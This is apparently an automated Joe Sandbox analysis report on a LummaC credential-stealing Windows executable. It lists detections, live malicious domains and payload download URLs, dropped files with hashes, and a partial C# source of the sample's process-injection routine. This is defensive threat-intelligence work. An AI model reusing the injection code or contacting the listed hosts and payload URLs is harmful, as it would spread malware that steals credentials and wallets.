        Obfuscated Files or Information        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561755 Sample: ZjH6H6xqo7.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 32 sector-essay.cyou 2->32 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Antivirus detection for URL or domain 2->42 44 13 other signatures 2->44 8 ZjH6H6xqo7.exe 15 10 2->8         started        signatures3 process4 dnsIp5 34 147.45.44.131, 49704, 80 FREE-NET-ASFREEnetEU Russian Federation 8->34 26 C:\Users\user\AppData\...\up5gphgh.cmdline, Unicode 8->26 dropped 28 C:\Users\user\AppData\Local\...\up5gphgh.0.cs, Unicode 8->28 dropped 30 C:\Users\user\AppData\...\ZjH6H6xqo7.exe.log, CSV 8->30 dropped 46 Writes to foreign memory regions 8->46 48 Allocates memory in foreign processes 8->48 50 Compiles code for process injection (via .Net compiler) 8->50 52 2 other signatures 8->52 13 RegAsm.exe 8->13         started        17 csc.exe 3 8->17         started        file6 signatures7 process8 dnsIp9 36 sector-essay.cyou 104.21.47.136, 443, 49705, 49706 CLOUDFLARENETUS United States 13->36 54 Query firmware table information (likely to detect VMs) 13->54 56 Tries to harvest and steal ftp login credentials 13->56 58 Tries to harvest and steal browser information (history, passwords, etc) 13->58 60 Tries to steal Crypto Currency Wallets 13->60 24 C:\Users\user\AppData\Local\...\up5gphgh.dll, PE32 17->24 dropped 20 conhost.exe 17->20         started        22 cvtres.exe 1 17->22         started        file10 signatures11 process12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        ZjH6H6xqo7.exe71%ReversingLabsByteCode-MSIL.Trojan.Leonem
        ZjH6H6xqo7.exe66%VirustotalBrowse
        ZjH6H6xqo7.exe100%AviraHEUR/AGEN.1306918
        ZjH6H6xqo7.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll100%AviraHEUR/AGEN.1300034
        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll100%Joe Sandbox ML

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://sector-essay.cyou/api100%Avira URL Cloudmalware
        https://sector-essay.cyou/apij100%Avira URL Cloudmalware
        http://147.45.44.131/infopage/tvh53.exe100%Avira URL Cloudmalware
        http://147.45.44.131/infopage/tvh53.exeP0%Avira URL Cloudsafe
        https://sector-essay.cyou/5100%Avira URL Cloudmalware
        https://sector-essay.cyou/apiO100%Avira URL Cloudmalware
        https://sector-essay.cyou/apiC100%Avira URL Cloudmalware
        https://sector-essay.cyou/100%Avira URL Cloudmalware
        http://147.45.44.1310%Avira URL Cloudsafe
        https://sector-essay.cyou:443/apiMicrosoft100%Avira URL Cloudmalware
        https://sector-essay.cyou/apie100%Avira URL Cloudmalware
        https://sector-essay.cyou:443/api100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        sector-essay.cyou
        		104.21.47.136
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://sector-essay.cyou/apitrue
          • Avira URL Cloud: malware
          		unknown
          http://147.45.44.131/infopage/tvh53.exefalse
          • Avira URL Cloud: malware
          		unknown
          thicktoys.sbsfalse
            		high
            300snails.sbsfalse
              		high
              faintbl0w.sbsfalse
                		high
                3xc1aimbl0w.sbsfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://sector-essay.cyou/5RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://sector-essay.cyou/apijRegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://147.45.44.131/infopage/tvh53.exePZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F21000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://sector-essay.cyou/apiORegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://sector-essay.cyou/apiCRegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://sector-essay.cyou/RegAsm.exe, 00000005.00000002.2267546315.00000000015D3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2267546315.0000000001570000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://147.45.44.131ZjH6H6xqo7.exe, 00000000.00000002.2074535680.0000000002F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://sector-essay.cyou:443/apiMicrosoftRegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://sector-essay.cyou/apieRegAsm.exe, 00000005.00000002.2267846615.00000000015F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://sector-essay.cyou:443/apiRegAsm.exe, 00000005.00000002.2267546315.000000000155A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    147.45.44.131
                    		unknownRussian Federation
                    		2895FREE-NET-ASFREEnetEUfalse
                    104.21.47.136
                    		sector-essay.cyouUnited States
                    		13335CLOUDFLARENETUStrue

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1561755
                    Start date and time:2024-11-24 08:34:42 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 5s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:ZjH6H6xqo7.exe
                    renamed because original name is a hash value
                    Original Sample Name:16a1fbd21af85d43b1ac31bf1829a152.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.expl.evad.winEXE@8/7@1/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 83%
                    • Number of executed functions: 36
                    • Number of non-executed functions: 97
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    02:35:35API Interceptor1x Sleep call for process: ZjH6H6xqo7.exe modified
                    02:35:38API Interceptor7x Sleep call for process: RegAsm.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    147.45.44.131nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                    • 147.45.44.131/infopage/tbh75.exe
                    TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                    • 147.45.44.131/infopage/tbg9.exe
                    7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                    • 147.45.44.131/infopage/tbg9.exe
                    7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                    • 147.45.44.131/infopage/bhdh552.ps1
                    Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                    • 147.45.44.131/infopage/cdeea.exe
                    file.exeGet hashmaliciousLummaCBrowse
                    • 147.45.44.131/files/gqgqg.exe
                    AS5AB7c08n.exeGet hashmaliciousMicroClipBrowse
                    • 147.45.44.131/files/tpgl053.exe
                    ptgl503.exeGet hashmaliciousLummaCBrowse
                    • 147.45.44.131/files/gpto03.exe
                    Suselx1.exeGet hashmaliciousLummaCBrowse
                    • 147.45.44.131/files/g5.exe
                    gkqg90.ps1Get hashmaliciousLummaCBrowse
                    • 147.45.44.131/files/otqp9.exe
                    104.21.47.136https://70183673.befb1d052c5367780a698112.workers.dev/favicon.icoa5Get hashmaliciousHTMLPhisherBrowse
                      http://ecv.microsoft.com/UudhycaukjGet hashmaliciousHTMLPhisherBrowse

                        Domains

                        No context

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSPAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                        • 104.21.40.167
                        file.exeGet hashmaliciousFormBookBrowse
                        • 172.67.186.192
                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                        • 172.67.168.228
                        CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        • 172.67.191.199
                        ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 104.21.67.152
                        VSP469620.exeGet hashmaliciousFormBookBrowse
                        • 104.21.44.16
                        purchase Order.exeGet hashmaliciousFormBookBrowse
                        • 172.67.145.234
                        CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                        • 172.67.168.228
                        Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                        • 104.21.67.152
                        TAX INVOICE.exeGet hashmaliciousFormBookBrowse
                        • 104.21.76.162
                        FREE-NET-ASFREEnetEUCall 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                        • 147.45.47.81
                        Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                        • 147.45.47.81
                        Script.exeGet hashmaliciousLummaC StealerBrowse
                        • 147.45.47.81
                        https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.orgGet hashmaliciousHTMLPhisherBrowse
                        • 147.45.178.112
                        http://147.45.47.98/js/error.jsGet hashmaliciousUnknownBrowse
                        • 147.45.47.98
                        hmips.elfGet hashmaliciousUnknownBrowse
                        • 193.233.193.45
                        ppc.elfGet hashmaliciousUnknownBrowse
                        • 193.233.193.45
                        mips.elfGet hashmaliciousUnknownBrowse
                        • 193.233.193.45
                        x86.elfGet hashmaliciousUnknownBrowse
                        • 193.233.193.45
                        owari.mips.elfGet hashmaliciousUnknownBrowse
                        • 147.45.234.212

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousLummaCBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, JasonRAT, LummaC Stealer, Stealc, VidarBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousLummaCBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousUnknownBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                        • 104.21.47.136
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.47.136

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZjH6H6xqo7.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:CSV text
                        Category:dropped
                        Size (bytes):847
                        Entropy (8bit):5.345615485833535
                        Encrypted:false
                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                        C:\Users\user\AppData\Local\Temp\RES6781.tmp

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Sun Nov 24 08:41:24 2024, 1st section name ".debug$S"
                        Category:dropped
                        Size (bytes):1336
                        Entropy (8bit):3.991383819364011
                        Encrypted:false
                        SSDEEP:24:HLm9psJ6KHxwKTFexmfwI+ycuZhNSXakSTAPNnqSSd:Wk6K6KTAxmo1ulIa3UqSC
                        MD5:9E77C69349D66459F94A610859E00667
                        SHA1:E3E8360803C4F78999AC5CF8F2EFE00D8E12D8A9
                        SHA-256:DAE2A9CB237F82382CC3D3A5AEC92F8CBD2A78058BE297B0987817C14E805E47
                        SHA-512:A2022840FB4314A75C23B30CB092E81C158D2E805C9D98B816D77A9CA604B3A5E3AB11624F8E5B4A500C3871478AD81A29E01A0B688481A79DAD7DB6C9F76E0A
                        Malicious:false
                        Reputation:low
                        Preview:L.....Bg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP......................._...V+..............5.......C:\Users\user\AppData\Local\Temp\RES6781.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.p.5.g.p.h.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                        C:\Users\user\AppData\Local\Temp\up5gphgh\CSCE347F25DAC914FE0BD5774A121A2513C.TMP

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.102451476879216
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryY4Yak7YnqqT4NPN5Dlq5J:+RI+ycuZhNSXakSTAPNnqX
                        MD5:9BB59F2E945FCE94F6B9562BCAF611DF
                        SHA1:9477D6CD071D2F3BBB8CFB3CFDC79DAF7DD7523E
                        SHA-256:3EA5DAE045CC2B3F1BCF78AA56ED4414DDA4CD220E4ADC3787AB29E1D30B5C79
                        SHA-512:D4E09EBE14A0650D68EF7F30007EB3C552D1CE2F390FC78A6B29609C4AD4CB8240805A3EE09565727BB2DDF770A52B072C55EB1C9DA5BAD3592399B960D3DC35
                        Malicious:false
                        Reputation:low
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.p.5.g.p.h.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.p.5.g.p.h.g.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.cs

                        Download File
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):10583
                        Entropy (8bit):4.487855797297623
                        Encrypted:false
                        SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                        MD5:B022C6FE4494666C8337A975D175C726
                        SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                        SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                        SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                        Malicious:true
                        Reputation:low
                        Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.cmdline

                        Download File
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                        Category:dropped
                        Size (bytes):206
                        Entropy (8bit):4.973455014317479
                        Encrypted:false
                        SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAIkFQEVyP0iQCIFRVRMxTPIUkh4E2B:pAu+H2L/6K2923fEbjzxszI923fEbM9
                        MD5:704DF70D3D2E88D3D34AFF54F4D550A6
                        SHA1:3388F18E67333F3B93251D00CE39A56819BCE69D
                        SHA-256:92254DCF3950333E2B5259AA6302043FC3375685B0B3FB4735A379E94CBF1592
                        SHA-512:0664C70E1F8DCE0B648AD79B59DF2F3421B6D931CBA5D6188DD5912E17B4369CF82C51A7404B8AE39B133C1B154D5569031067BCB7B343D768422E97CA13D49D
                        Malicious:true
                        Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.cs"

                        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll

                        Download File
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):8704
                        Entropy (8bit):4.664111296042152
                        Encrypted:false
                        SSDEEP:96:KbuaQZGQf9xPQ2pCa/u67hHJif9IhbpPrjzKcaEZRcH0ljILHqrv5MqBTzeNc+iz:KCaQHf9WDa/u6VRj2ca7Uxd5MqReNcH
                        MD5:57E62C581F83867854E6B3F6E7347526
                        SHA1:0CE17F0CE2AB77D673ADFBFC41B39D882E81169A
                        SHA-256:FBC2D40418BDAE4A519A1F465B3D99A3B60DCE6E3437B4034509687A065F3C38
                        SHA-512:86B59090EFAB36491DE88718ECB8DBC16933EB5B969CA05FC8D7B642A31ECC7DF8DBC2F3CD2D01F7BCDA20C0497A8161880B38B73928B9F00742B5D55A27CBF0
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Bg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                        C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.out

                        Download File
                        Process:C:\Users\user\Desktop\ZjH6H6xqo7.exe
                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):705
                        Entropy (8bit):5.2111508376695825
                        Encrypted:false
                        SSDEEP:12:KMi/qR37L/6KzsbjwsbM4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6KzsbMsb/Kax5DqBVKVrdFAMBt
                        MD5:F7538DA443799D6D33CB43301E82A9CC
                        SHA1:5D8DA53593636552D0A67538370873456EC7B68F
                        SHA-256:53E10AF41DEA46EDD9C3DA16B82B0514FA087B85A31B88C5A3C2364EF218070B
                        SHA-512:CA716765FB24C7FB6F2CF26BE94282CE35454D1B3E8654FFA1D5E5740C097B5E0EDEA45B724ADE05204B9828621E1B09731FAC98C9B7C5C178DFAE7F9238982C
                        Malicious:false
                        Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\up5gphgh\up5gphgh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):3.9202524936856595
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        • Win32 Executable (generic) a (10002005/4) 49.78%
                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:ZjH6H6xqo7.exe
                        File size:44'544 bytes
                        MD5:16a1fbd21af85d43b1ac31bf1829a152
                        SHA1:522a835acc8ec09d9d74d695fb9ebaed3b2d72ff
                        SHA256:36589e0ed1c8a584dc014add50db2f2ac1c5a0cfac5403f7b7886b66e26a1d86
                        SHA512:d5d46d0b8832e58b2857ca9daad28c0dea83ba11846894995ce01d05d1be93644a50996a6b66e41db9da00282216bb96fc6f05a4ca7111b2aee4330678c30672
                        SSDEEP:768:5/EVNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4fet:5sVN7aeGEk+11Tu9AnQVLNppvk9RN4Gt
                        TLSH:9913585571FEA029D5BBEBB5BEDDACEDC89E5971182C645700C1928B4B20FE0EA43C34
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............B.... ........@.. ....................... ............`................................

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x40c342
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0xEFCB81EF [Wed Jun 26 13:28:15 2097 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [00402000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
